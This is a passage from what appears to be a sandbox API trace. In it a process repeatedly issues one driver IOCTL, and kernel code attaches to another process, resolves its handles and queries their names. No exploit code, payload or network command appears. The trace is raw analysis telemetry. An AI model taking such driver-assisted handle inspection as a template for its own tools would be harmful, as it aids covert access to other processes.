Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.001] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.001] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.001] PsAcquireProcessExitSynchronization () returned 0x0 [0133.001] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.001] ObReferenceObjectByHandle (in: Handle=0x3b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017aa130, HandleInformation=0x0) returned 0x0 [0133.001] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.001] PsReleaseProcessExitSynchronization () returned 0x2 [0133.001] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.002] ObQueryNameString (in: Object=0xfffff8a0017aa130, ObjectNameInfo=0xfffffa8002f5d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5d044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.002] ObfDereferenceObject (Object=0xfffff8a0017aa130) returned 0x1 [0133.002] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.002] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.002] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.002] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.002] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.002] PsAcquireProcessExitSynchronization () returned 0x0 [0133.002] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.002] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0014c23e0, HandleInformation=0x0) returned 0x0 [0133.002] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.002] PsReleaseProcessExitSynchronization () returned 0x2 [0133.002] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.002] ObQueryNameString (in: Object=0xfffff8a0014c23e0, ObjectNameInfo=0xfffffa800289c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800289c044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.002] ObfDereferenceObject (Object=0xfffff8a0014c23e0) returned 0x1 [0133.003] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.003] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.003] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.003] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.003] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.003] PsAcquireProcessExitSynchronization () returned 0x0 [0133.003] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.003] ObReferenceObjectByHandle (in: Handle=0x3d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017b4430, HandleInformation=0x0) returned 0x0 [0133.003] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.003] PsReleaseProcessExitSynchronization () returned 0x2 [0133.003] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.003] ObQueryNameString (in: Object=0xfffff8a0017b4430, ObjectNameInfo=0xfffffa8002f5b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5b044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.003] ObfDereferenceObject (Object=0xfffff8a0017b4430) returned 0x1 [0133.003] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.003] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.003] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.003] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.004] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.004] PsAcquireProcessExitSynchronization () returned 0x0 [0133.004] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.004] ObReferenceObjectByHandle (in: Handle=0x3e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017c7d70, HandleInformation=0x0) returned 0x0 [0133.004] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.004] PsReleaseProcessExitSynchronization () returned 0x2 [0133.004] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.004] ObQueryNameString (in: Object=0xfffff8a0017c7d70, ObjectNameInfo=0xfffffa8002f57044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f57044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.004] ObfDereferenceObject (Object=0xfffff8a0017c7d70) returned 0x1 [0133.004] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.004] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.004] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.004] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.004] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.004] PsAcquireProcessExitSynchronization () returned 0x0 [0133.004] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.004] ObReferenceObjectByHandle (in: Handle=0x3f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00122ffc0, HandleInformation=0x0) returned 0x0 [0133.004] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.004] PsReleaseProcessExitSynchronization () returned 0x2 [0133.004] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.004] ObQueryNameString (in: Object=0xfffff8a00122ffc0, ObjectNameInfo=0xfffffa8002f55044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f55044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.004] ObfDereferenceObject (Object=0xfffff8a00122ffc0) returned 0x1 [0133.005] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.005] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.005] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.005] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.005] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.005] PsAcquireProcessExitSynchronization () returned 0x0 [0133.005] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.005] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00180c9f0, HandleInformation=0x0) returned 0x0 [0133.005] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.005] PsReleaseProcessExitSynchronization () returned 0x2 [0133.005] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.005] ObQueryNameString (in: Object=0xfffff8a00180c9f0, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.005] ObfDereferenceObject (Object=0xfffff8a00180c9f0) returned 0x1 [0133.005] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.005] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.005] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.005] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.005] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.005] PsAcquireProcessExitSynchronization () returned 0x0 [0133.005] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.005] ObReferenceObjectByHandle (in: Handle=0x414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00180a9d0, HandleInformation=0x0) returned 0x0 [0133.006] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.006] PsReleaseProcessExitSynchronization () returned 0x2 [0133.006] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.006] ObQueryNameString (in: Object=0xfffff8a00180a9d0, ObjectNameInfo=0xfffffa8002877044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002877044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.006] ObfDereferenceObject (Object=0xfffff8a00180a9d0) returned 0x1 [0133.006] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.006] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.006] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.006] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.006] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.006] PsAcquireProcessExitSynchronization () returned 0x0 [0133.006] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.006] ObReferenceObjectByHandle (in: Handle=0x424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00182a7f0, HandleInformation=0x0) returned 0x0 [0133.006] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.006] PsReleaseProcessExitSynchronization () returned 0x2 [0133.006] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.006] ObQueryNameString (in: Object=0xfffff8a00182a7f0, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.007] ObfDereferenceObject (Object=0xfffff8a00182a7f0) returned 0x1 [0133.007] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.007] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.007] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.007] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.007] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.007] PsAcquireProcessExitSynchronization () returned 0x0 [0133.007] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.007] ObReferenceObjectByHandle (in: Handle=0x434, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017c1b00, HandleInformation=0x0) returned 0x0 [0133.007] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.007] PsReleaseProcessExitSynchronization () returned 0x2 [0133.007] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.007] ObQueryNameString (in: Object=0xfffff8a0017c1b00, ObjectNameInfo=0xfffffa80022b0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022b0044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.007] ObfDereferenceObject (Object=0xfffff8a0017c1b00) returned 0x1 [0133.007] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.008] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.008] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.008] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.008] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.008] PsAcquireProcessExitSynchronization () returned 0x0 [0133.008] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.008] ObReferenceObjectByHandle (in: Handle=0x444, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017ec440, HandleInformation=0x0) returned 0x0 [0133.008] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.008] PsReleaseProcessExitSynchronization () returned 0x2 [0133.008] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.008] ObQueryNameString (in: Object=0xfffff8a0017ec440, ObjectNameInfo=0xfffffa80025f1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025f1044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.008] ObfDereferenceObject (Object=0xfffff8a0017ec440) returned 0x1 [0133.008] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.008] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.008] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.008] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.008] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.008] PsAcquireProcessExitSynchronization () returned 0x0 [0133.008] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.008] ObReferenceObjectByHandle (in: Handle=0x454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017cb710, HandleInformation=0x0) returned 0x0 [0133.008] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.009] PsReleaseProcessExitSynchronization () returned 0x2 [0133.009] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.009] ObQueryNameString (in: Object=0xfffff8a0017cb710, ObjectNameInfo=0xfffffa8002092044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002092044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.009] ObfDereferenceObject (Object=0xfffff8a0017cb710) returned 0x1 [0133.009] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.009] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.009] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.009] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.009] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.009] PsAcquireProcessExitSynchronization () returned 0x0 [0133.009] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.009] ObReferenceObjectByHandle (in: Handle=0x458, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001864ba0, HandleInformation=0x0) returned 0x0 [0133.009] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.009] PsReleaseProcessExitSynchronization () returned 0x2 [0133.009] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.009] ObQueryNameString (in: Object=0xfffff8a001864ba0, ObjectNameInfo=0xfffffa8002640044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002640044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.009] ObfDereferenceObject (Object=0xfffff8a001864ba0) returned 0x1 [0133.009] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.009] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.009] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.009] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.009] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.010] PsAcquireProcessExitSynchronization () returned 0x0 [0133.010] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.010] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0015de660, HandleInformation=0x0) returned 0x0 [0133.010] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.010] PsReleaseProcessExitSynchronization () returned 0x2 [0133.010] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.010] ObQueryNameString (in: Object=0xfffff8a0015de660, ObjectNameInfo=0xfffffa80026a2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026a2044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.010] ObfDereferenceObject (Object=0xfffff8a0015de660) returned 0x1 [0133.010] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.010] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.010] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.010] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.010] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.010] PsAcquireProcessExitSynchronization () returned 0x0 [0133.010] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.010] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001875a00, HandleInformation=0x0) returned 0x0 [0133.010] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.010] PsReleaseProcessExitSynchronization () returned 0x2 [0133.010] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.011] ObQueryNameString (in: Object=0xfffff8a001875a00, ObjectNameInfo=0xfffffa80026a4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026a4044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.011] ObfDereferenceObject (Object=0xfffff8a001875a00) returned 0x1 [0133.011] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.011] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.011] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.011] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.011] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.011] PsAcquireProcessExitSynchronization () returned 0x0 [0133.011] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.011] ObReferenceObjectByHandle (in: Handle=0x47c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0014f75e0, HandleInformation=0x0) returned 0x0 [0133.011] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.011] PsReleaseProcessExitSynchronization () returned 0x2 [0133.011] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.011] ObQueryNameString (in: Object=0xfffff8a0014f75e0, ObjectNameInfo=0xfffffa80027e0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e0044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.011] ObfDereferenceObject (Object=0xfffff8a0014f75e0) returned 0x1 [0133.011] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.011] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.011] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.011] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.011] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.012] PsAcquireProcessExitSynchronization () returned 0x0 [0133.012] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.012] 